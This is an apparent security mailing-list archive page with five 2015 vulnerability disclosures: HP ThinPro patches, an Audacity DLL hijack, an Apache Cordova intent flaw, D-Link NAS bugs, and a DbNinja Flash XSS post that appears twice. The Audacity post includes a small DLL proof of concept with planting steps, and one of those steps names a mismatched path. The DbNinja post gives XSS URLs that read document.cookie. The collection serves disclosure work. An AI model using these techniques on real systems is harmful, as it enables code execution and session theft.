[security bulletin] HPSBHF03340 rev.1 - HP ThinPro Linux and HP Smart Zero Core running HP Easy Setup Wizard, Local Unauthorized Access, Elevation of Privilege

2015-05-28 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

UPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04692275
Version: 1

HPSBHF03340 rev.1 - HP ThinPro Linux and HP Smart Zero Core running HP Easy
Setup Wizard, Local Unauthorized Access, Elevation of Privilege

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-05-27
Last Updated: 2015-05-27

Potential Security Impact: Local unauthorized access, elevation of privilege

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP ThinPro Linux
and HP Smart Zero Core running HP Easy Setup Wizard. The vulnerability could
result in local unauthorized access and elevation of privilege on an HP thin
client device.

References:

CVE-2015-2124
SSRT102045

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP ThinPro Linux and HP Smart Zero Core. Following is the list of affected
versions:

HP ThinPro:

HP ThinPro Linux 5.1 (x86)
HP ThinPro Linux 5.0 (x86)
HP ThinPro Linux 4.4 (x86)
HP ThinPro Linux 4.3 (x86)
HP ThinPro Linux 4.2 (x86)
HP ThinPro Linux 4.1 (x86)

HP Smart Zero Core:

HP Smart Zero Core 4.4 (x86)
HP Smart Zero Core 4.4 (ARM)
HP Smart Zero Core 4.3 (x86)
HP Smart Zero Core 4.3 (ARM)

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2015-2124(AV:L/AC:L/Au:S/C:C/I:C/A:C)   6.8
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has released the following software updates to resolve the vulnerability.

Download the patch for the appropriate Operating System version from the
table:

Product Version
 Link to download Patch

HP ThinPro Linux 5.1 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/SecurityRollup2015
- -all-5.1-x86.xar

HP ThinPro Linux 5.0 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/SecurityRollup2015
- -all-5.0-x86.xar

HP ThinPro Linux 4.4 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/SecurityRollup2015
- -TP-4.4-x86.xar

HP ThinPro Linux 4.3 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/SecurityRollup2015
- -TP-4.3-x86.xar

HP ThinPro Linux 4.2 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/SecurityRollup2015
- -TP-4.2-x86.xar

HP ThinPro Linux 4.1 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/SecurityRollup2015
- -TP-4.1-x86.xar

HP Smart Zero Core 4.4 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/SecurityRollup2015
- -SZ-4.4-x86.xar

HP Smart Zero Core 4.4 (ARM)
 https://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/SecurityRollup2015
- -SZ-4.4-armel.xar

HP Smart Zero Core 4.3 (x86)
 https://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/SecurityRollup2015
- -SZ-4.3-x86.xar

HP Smart Zero Core 4.3 (ARM)
 https://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/SecurityRollup2015
- -SZ-4.3-armel.xar

HISTORY
Version:1 (rev.1) - 27 May 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages f

Audacity 2.0.5 contains Arbitrary DLL Injection Code Execution

2015-05-28 Thread mystyle_rahul 
A local dll injection vulnerability has been discovered in the official 
Audacity 2.0.5.
Since the program is not specified with a fully qualified path name the program 
uses a fixed path to look for specific files or libraries. This path includes 
directories that may not be trusted or under user control. By placing a custom 
version of the file or library in the path, the program will load it before the 
legitimate version. This allows a local attacker to inject custom code that 
will be run with the privilege of the program or user executing the program. 
This attack can be leveraged remotely in some cases by placing the malicious 
file or library on a network share or extracted archive downloaded from a 
remote source. This can be done by tricking a user into running a hostile 
script from the local file system or a USB drive in some cases.

Since the program is not specified with a fully qualified path name the program 
uses a fixed path to look for specific files or libraries. This path includes 
directories that may not be trusted or under user control. By placing a custom 
version of the file or library in the path, the program will load it before the 
legitimate version. This allows a local attacker to inject custom code that 
will be run with the privilege of the program or user executing the program. 
This attack can be leveraged remotely in some cases by placing the malicious 
file or library on a network share or extracted archive downloaded from a 
remote source. This can be done by tricking a user into running a hostile 
script from the local file system or a USB drive in some cases.

When a malicious dll is created with the following names:
avformat-52.dll
avutil-50.dll
avcodec-52.dll
and placed in the directory of the installed audacity C:\Program Files 
(x86)\Audacity . And when Audacity will be started by the legitmate user it 
will start the process and just close by and in meanwhile the code within the 
malicious DLL will be executed and can lead to total compromise the system in 
which it is installed

Vulnerability Information:
Class: DLL Hijacking
Impact: System access
Remotely Exploitable: Yes
Locally Exploitable: Yes

Vulnerable Software:
[+] Audacity

Vulnerable Version(s):
[+] v2.0.5

Vulnerable Libraries:
[+]avformat-52.dll
[+]avutil-50.dll
[+]avcodec-52.dll

Proof of Concept (PoC):
===
Manual steps to reproduce the local vulnerability ...
1. Compile dll and rename to avformat-52.dll , avutil-50.dll , avcodec-52.dll
2. Copy avformat-52.dll to C:\Program Files\Staff-FTP
3. Launch Audacity

PoC: Exploit 
#include 
 
int alpdaemon()
{
  WinExec("calc", SW_SHOW);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  alpdaemon();
  return 0;
}

CVE-2015-1835: ...

2015-05-28 Thread Dirk-Willem van Gulik on behalf of Apache Cordova 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

CVE-2015-1835: Remote exploit of secondary configuration variables in 
   Apache Cordova on Android

Severity:  High

Vendor:The Apache Software Foundation

Versions Affected:
   Cordova Android up to 4.0.1 (3.7.2 excluded)

Description:

Android applications built with the Cordova framework that don't have 
explicit values set in Config.xml can have undefined configuration 
variables set by Intent.  This can cause unwanted dialogs appearing 
in applications and changes in the application behaviour that can 
include the app force-closing.

The latest release of Cordova Android entirely removes the ability 
of configuration parameters to be set by intents.  This change is 
an API change in the platform, and third-party plugins that use 
values set in the config.xml should make sure that they use the 
preferences API instead of relying on the Intent bundle, whcih 
can be manipulated in this case.

Upgrade path:

Developers who are concerned about this should rebuild their 
applications with either Cordova Android 4.0.2, or Cordova 3.7.4 
if they are unable to upgrade to Cordova 4.0.2. Developers should 
also make sure that variables that they wish to have protected 
are specified in their config.xml.

Credit:

This issue was discovered by Seven Shen of Trend Micro Mobile Threat Research 
Team
-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2.0
Comment: This message is encrypted and/or signed with PGP (gnu-pg, gpg). 
Contact di...@webweaving.org if you cannot read it.

iQCVAwUBVWbyfDGmPZbsFAuBAQim5gP8C/3m6DPI4YljLINtgtXgK+NOI2InjBPI
MA0bb10da+XUCLrcHoJnMHdBL2aGhltnKapNjp4I4gph0QIkhlhIUXelHojPSjRH
3ectaNsFCTJHofHKiMROtH3Fb5Gqo5U7LPtduvjCE4q/rJB/9LOHIojwWw/VqQo3
eBPdk/6bSaw=
=ax4a
-END PGP SIGNATURE-

[SEARCH-LAB advisory] More than fifty vulnerabilities in D-Link NAS and NVR devices

2015-05-28 Thread Gergely Eberhardt 
Overwiew

SEARCH-LAB performed an independent security assessment on four
different D-Link devices. The assessment has identified altogether 53
unique vulnerabilities in the latest firmware (dated 30-07-2014).
Several vulnerabilities can be abused by a remote attacker to execute
arbitrary code and gain full control over the devices. We list below
several of the problematic areas, where the most critical findings were
discovered:
- Authentication can be bypassed in several ways, allowing an attacker
to take full control over the device without the need to exploit any
programming or design bugs.
- We found a few half-baked security workarounds to fix earlier
vulnerabilities that introduced even more serious problems, leading to
command injection and the possibility to take full control over the device.
- Even though there were several security patches and workarounds in the
session management part of the code, where we still found serious
problems. It was still possible to perform unauthenticated file upload
to an arbitrarily chosen location, which also lead to the possibility
for an attacker to take full control over the device.
- Default users (root, nobody) can be used during authentication, and
the administrator cannot change the default (empty) password of these
users from the user interface.

Details and CVEs

For the specific details see our full report in [SL-ADV]. We suppose
that some of the vulnerabilities were discovered by other researchers
too, but we saw it reasonable and useful to publish our findings in such
a comprehensive study. Naturally in the report we tried to find and
reference all of the previous publications that may have found the same
problems.
We obtained the following CVE numbers for the above described
vulnerabilities:
- CVE-2014-7858: Check_login bypass vulnerability in DNR-326
- CVE-2014-7859: Buffer overflow in login_mgr.cgi and in file_sharing.cgi
- CVE-2014-7860: Unauthenticated photo publish
We also reported two other authentication bypass vulnerabilities
(CVE-2014-7857) to D-Link; but since these problems have not been
addressed correctly yet, we will only publish them after 22/06/2015.

Affected devices

Main targeted devices during the assessment:
- DNS-320, Revision A: 2.03, 13/05/2013
- DNS-320L, 1.03b04, 11/11/2013
- DNS-327L, 1.02, 02/07/2014
- DNR-326, 1.40b03, 7/19/2013

Other devices were influenced by one or more vulnerabilities:
- DNS-320B, 1,02b01, 23/04/2014
- DNS-345, 1.03b06, 30/07/2014
- DNS-325, 1.05b03, 30/12/2013
- DNS-322L, 2.00b07

See [SL-ADV] for the complete vulnerability matrix at the time of the
assessment. We note that other devices may also be vulnerable.

Solution

Most of the vulnerabilities were fixed in:
- DNS-320L 1.04.B12
- DNS-327L 1.03.B04

Some of the vulnerabilities were fixed in:
- DNR-326 2.10.B03
- DNR-322L 2.10.B03

Besides installing the patches, where available, we highly recommend not
to expose the web interface of the DNS and DNR devices to the internet.
Since the devices use the UPnP feature, you should disable it in the router.

Credits
---
These vulnerabilities were discovered and researched by Gergely
Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)

References
--
[SL-ADV] Security Advisory, MULTIPLE VULNERABILITIES IN D-LINK DNS-320,
320L, 327L AND DNR-326 DEVICES,
http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf
[DNS-320] http://support.dlink.com/ProductInfo.aspx?m=DNS-320
[DNS-320L] http://support.dlink.com/ProductInfo.aspx?m=DNS-320L
[DNS-327L] http://support.dlink.com/ProductInfo.aspx?m=DNS-327L
[DNS-345] http://support.dlink.com/ProductInfo.aspx?m=DNS-345
[DNS-325] http://support.dlink.com/ProductInfo.aspx?m=DNS-325
[DNR-326] http://support.dlink.com/ProductInfo.aspx?m=DNR-326
[DNR-322L] http://support.dlink.com/ProductInfo.aspx?m=DNR-322L

DbNinja 3.2.6 Flash XSS Vulnerabilities

2015-05-28 Thread apparitionsec 
# Exploit Title: DbNinja Flash XSS Exploit
# Google Dork: intitle: Flash XSS
# Date: May 27, 2015
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: www.dbninja.com
# Software Link: www.dbninja.com
# Version: 3.2.6
# Tested on: Windows 7
# Category: Flash XSS
# CVE : NA


Source:
http://hyp3rlinx.altervista.org/advisories/AS-DBNINJA0527.txt


Product:
DbNinja is a web based application for MySQL database administration.


Advisory Information:

DbNinja multiple Flash based XSS vulnerabilities


Vulnerability Details:
=
The DbNinja Flash uploader component contains 2 SWF files that use Flash 
'ExternalInterface' API to call Javascript functions.
These SWFs can be exploited by supplying malicious code as parameters to those 
functions from the URL. The text value "Copy to Clipboard" can also be changed 
using the "buttonText" parameter.



Exploit code(s):
===

1- 
http://localhost/dbninja/dbninja/js/lib/uploader.swf?selectCallback=alert(document.cookie)

2- 
http://localhost/dbninja/dbninja/js/lib/clipboard.swf?buttonText=DbNinja%20Login&dataSourceFunc=alert(document.cookie)

3- 
http://localhost/dbninja/dbninja/js/lib/clipboard.swf?completeCallback=alert(document.cookie)
 



Disclosure Timeline:
=

Vendor Notification  May 23, 2015
May 27, 2015: Public Disclosure



Severity Level:
=
High



Description:
==

Request Method(s):
[+] GET

Vulnerable Product:
[+] DBNinja 3.2.6

Vulnerable Parameter(s):
[+] selectCallback, dataSourceFunc & 
completeCallback

Affected Area(s):
[+] uploader.swf, clipboard.swf

===

(hyp3rlinx)

DbNinja 3.2.6 Flash XSS Vulnerabilities

2015-05-28 Thread apparitionsec 
# Exploit Title: DbNinja Flash XSS Exploit
# Google Dork: intitle: Flash XSS
# Date: May 27, 2015
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: www.dbninja.com
# Software Link: www.dbninja.com
# Version: 3.2.6
# Tested on: Windows 7
# Category: Flash XSS
# CVE : NA


Source:
http://hyp3rlinx.altervista.org/advisories/AS-DBNINJA0527.txt


Product:
DbNinja is a web based application for MySQL database administration.


Advisory Information:

DbNinja multiple Flash based XSS vulnerabilities


Vulnerability Details:
=
The DbNinja Flash uploader component contains 2 SWF files that use Flash 
'ExternalInterface' API to call Javascript functions.
These SWFs can be exploited by supplying malicious code as parameters to those 
functions from the URL. The text value "Copy to Clipboard" can also be changed 
using the "buttonText" parameter.



Exploit code(s):
===

1- 
http://localhost/dbninja/dbninja/js/lib/uploader.swf?selectCallback=alert(document.cookie)

2- 
http://localhost/dbninja/dbninja/js/lib/clipboard.swf?buttonText=DbNinja%20Login&dataSourceFunc=alert(document.cookie)

3- 
http://localhost/dbninja/dbninja/js/lib/clipboard.swf?completeCallback=alert(document.cookie)
 



Disclosure Timeline:
=

Vendor Notification  May 23, 2015
May 27, 2015: Public Disclosure



Severity Level:
=
High



Description:
==

Request Method(s):
[+] GET

Vulnerable Product:
[+] DBNinja 3.2.6

Vulnerable Parameter(s):
[+] selectCallback, dataSourceFunc & 
completeCallback

Affected Area(s):
[+] uploader.swf, clipboard.swf

===

(hyp3rlinx)